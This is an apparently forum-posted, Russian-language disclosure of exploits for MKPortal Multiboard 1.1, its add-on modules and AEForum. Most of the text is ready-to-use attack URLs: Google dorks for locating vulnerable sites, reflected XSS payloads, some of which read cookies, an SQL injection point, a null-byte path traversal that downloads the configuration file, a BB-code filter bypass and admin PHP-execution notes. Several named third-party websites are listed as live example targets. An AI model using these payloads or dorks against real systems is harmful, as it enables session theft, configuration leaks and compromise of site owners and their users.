MKPortal Multiboard 1.1

Уязвимый продукт: MKPortal Multiboard 1.1
Дорк: "inurl:index.php?ind="

1. Расскрытие пути

Exploit:
/index.php?ind[]=news

/mkportal/admin/ad_menu.php

Вызов любого скрипта из папки blocks, например:
/mkportal/blocks/chat.php
/mkportal/blocks/random_pic.php
/mkportal/blocks/random_quote.php
/mkportal/blocks/search.php
В скрипты не инклудятся файлы, однако идет вызов сторонних функций

2. XSS

Код:
$return = "http://".$_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME']."?".$_SERVER['QUERY_STRING']."#cal";

Exploit:
Множественные уязвимости из-за стандартного модуля - календарь
/index.php?"><script>alert()</script>
Либо любой линк подобного типа, например
/index.php?ind=gallery&op=section_view"><script>alert()</script>

/mkportal/include/pmpopup.php?m1=<script>alert()</script>
/mkportal/include/pmpopup.php?m2=<script>alert()</script>
/mkportal/include/pmpopup.php?m3=<script>alert()</script>
/mkportal/include/pmpopup.php?m4=<script>alert()</script>


3. SQL-INJ

Exploit:
http://cms.ru/index.php?ind=news&op=del_comment&idcomm={SQL-INJ}
Скуль требует админских прав, посему толку мало.


4. Возможность скачать любые файлы, в том числе конфигурационные

Exploit:
/index.php?ind=downloads&op=download_file&ide=2&file=../../../conf_mk.php%00


Единственный косяк(а иногда плюс) - что при таком запросе запрашиваемый файл (../../../conf_mk.php)
переименовывается в /modules/downloads/file/mk_{IDE}_{FILE_NAME}.mk

...
$real_file = "mkportal/modules/downloads/file/mk_".$ide."_".$file;
...
if (is_file("mkportal/modules/downloads/file/".$file)) {
@rename("mkportal/modules/downloads/file/".$file, $real_file);
}
И вот в чем прикол, если запросить конфигурационный файл, мы его запросим на загрузку,
НО он переместится в папку mkportal/modules/downloads/file/,
и соответственно в корне его не будет => не будет работать движок...
(в принципе нужно подумать как это можно еще заюзать... можно также переместить какой нибудь
подключаемый файл и радоваться необъявленными переменными...)

5. Разные сведения и мысли


1. (.htaccess отсутствует напрочь везде)
2. (В index.php?ind=downloads&op=add_file запрещена загрузка php,
a phtml проходит, однако переименовывается в /modules/downloads/file/mk_{IDE}_{FILE_NAME}.mk)
3. Директория mkportal/modules/downloads/file/ как и многие другие доступна для листинга
4. Выполнение пхп кода в админке
http://cms.ru/mkportal/admin.php?ind=ad_blocks&op=blocks_new_php
(блоки->создание->Создать блок php, пишем код, нажимаем пимпу "Предпросмотр кода" )
5. Все эти баги работают не везде, поэтому есть мысль, что по просторам гуляют разные "Сборки" двига, а загрузка на официальном сайте сейчас прикрыта...

Multiple pXSS в MKPortal module GBook

Уязвимый продукт: MKPortal module gbook (http://www.rusmkportal.ru/index.php?ind=downloads&op=entry_view&iden=56)
Дорк: "inurl:index.php?ind=gbook"

1. Multiple pXSS
Уязвимость в файле index.php.

Exploit:
/index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E

Example:
http://otradnoe.ru.net//index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E
http://otradnoe.ru.net//index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E
http://otradnoe.ru.net//index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E

2. Вставка запрещённых bb-тегов [i*mg] и [u*rl] в сообщение

Уязвимость в файле index.php.
Уязвимый кусок кода:


$message = stripslashes($message);
$message = preg_replace('/\(.+)\[\/URL\]/i',$no_url,$message);
$message = preg_replace('/\(.+?)\[\/IMG\]/i',$no_img,$message);
$message = str_replace("ttp","", $message);


обходим ограничения:


[UttpRL=htttptp://antichat.ru]antichat.ru ((.+?)\)
[IMttpG]htttptps://forum.antichat.ru/image.php?u=37072&dateline=

MKPortal module whois

Уязвимый продукт: MKPortal module whois (http://www.rusmkportal.ru/index.php?ind=downloads&op=entry_view&iden=52)
Дорк: "inurl:index.php?ind=whois"

1. pXSS
Уязвимость в файле index.php.

Exploit:
/index.php?ind=whois&blocks=%3Cscript%3Ealert(1)%3C/script%3E

Example:
http://kitimedia.com/index.php?ind=whois&blocks=%3Cscript%3Ealert(1)%3C/script%3E

MKPortal module lenta

Уязвимый продукт: MKPortal module lenta (http://www.rusmkportal.ru/index.php?ind=downloads&op=entry_view&iden=41)
Дорк: "inurl:index.php?ind=" грабер lenta

1. Multiple pXSS
Уязвимость в файле index.php.

Exploit:
/index.php?ind=lenta&output=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=lenta&blocks=%3Cscript%3Ealert(1)%3C/script%3E

Example:
http://www.nissanclub72.ru/index.php?ind=lentanews&output=%3Cscript%3Ealert(1)%3C/script%3E
http://www.nissanclub72.ru/index.php?ind=lentanews&blocks=%3Cscript%3Ealert(1)%3C/script%3E

MKPortal modules
1. pXSS
Уязвимый продукт: MKPortal modules
metric (http://www.rusmkportal.ru/index.php?ind=downloads&op=entry_view&iden=42)
Exploit:
/metric/?output=%3Cscript%3Ealert(1)%3C/script%3E
/metric/?error=%3Cscript%3Ealert(1)%3C/script%3E
/metric/?blocks=%3Cscript%3Ealert(1)%3C/script%3E

recommend (http://www.rusmkportal.ru/index.php?ind=downloads&op=entry_view&iden=25)
Exploit:
/index.php?ind=recommend&blocks=%3Cscript%3Ealert(1)%3C/script%3E

Example:

http://www.street-style.su/index.php?ind=recommend&blocks=%3Cscript%3Ealert(1)%3C/script%3E

anekdot (http://www.rusmkportal.ru/index.php?ind=downloads&op=entry_view&iden=24)
Exploit:
/Anekdot/?output=%3Cscript%3Ealert(1)%3C/script%3E
/Anekdot/?blocks=%3Cscript%3Ealert(1)%3C/script%3E
/Anekdot/?contents=%3Cscript%3Ealert(1)%3C/script%3E

Example:

http://www.isranetclub.com/isra/Anekdot/?output=%3Cscript%3Ealert(1)%3C/script%3E
http://www.isranetclub.com/isra/Anekdot/?blocks=%3Cscript%3Ealert(1)%3C/script%3E
http://www.isranetclub.com/isra/Anekdot/?contents=%3Cscript%3Ealert(1)%3C/script%3E

contact (http://www.rusmkportal.ru/index.php?ind=downloads&op=entry_view&iden=23)
Exploit:
/contact/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E
/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&output=%3Cscript%3Ealert(1)%3C/script%3E
/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&blocks=%3Cscript%3Ealert(1)%3C/script%3E

speed connection (http://www.rusmkportal.ru/index.php?ind=downloads&op=entry_view&iden=22)
Exploit:
/speed/?output=%3Cscript%3Ealert(1)%3C/script%3E
/speed/?blocks=%3Cscript%3Ealert(1)%3C/script%3E

horoscop (http://www.rusmkportal.ru/index.php?ind=downloads&op=entry_view&iden=20)
Exploit:
/index.php?ind=horoscop&blocks=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=horoscop&output=%3Cscript%3Ealert(1)%3C/script%3E

phones (http://www.rusmkportal.ru/index.php?ind=downloads&op=entry_view&iden=21)
Exploit:
/catphones/index.php?output=%3Cscript%3Ealert(1)%3C/script%3E
/catphones/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E


В общем, уязвимость писутствует из-за тупости. в коде есть переменная, которая формируется в ходе выполнения скрипта и ей постепенно присваиваются дополнительные данные. В уязвимых модулях код примерно выглядит следующим образом:

<?
//code
if (/*some*/) {
//some code
vuln_var .= 'some content';
} else {
//some code
vuln_var .= 'some content';
}
//some code
echo $vuln_var;
//some code
?>

Эта xss распространена на 90% модулей для MKPortal с сайта rusmkportal.ru. Я протестил не все, так как при установке некоторых отказывался работать денвер.

Множественные XSS

1. http://site.ru/aeforum/index.php?act=usercp&ucpact=searchpm
Уязвимы все поля:
from
to
subject
hasthewords
doesnthave

2. http://site.ru/aeforum/index.php?act=usercp&ucpact=profileУязвимы все поля:
dobyear
dobmonth
dobday
title
location
privatetext
icq
yim
msn
aim
gmail
www

3. http://site.ru/aeforum/index.php?act=usercp&ucpact=writepmpmrecipients
pmsubject
pmbody

3. http://site.ru/aeforum/index.php?act=members&sortby=1&order=1&beg="><script>document.write(document.cookie)</script>

4. http://site.ru/aeforum/index.php?act=usercp&ucpact=account
Поля
realname
secretqt


5. http://site.ru/aeforum/index.php?act=search&sact=results&allwords=&exactphrase=&atleastone=&without=</script><script>document.write(document.cookie)</script>&within=1&starter=&forums%5B%5D=0&showas=1&search=Search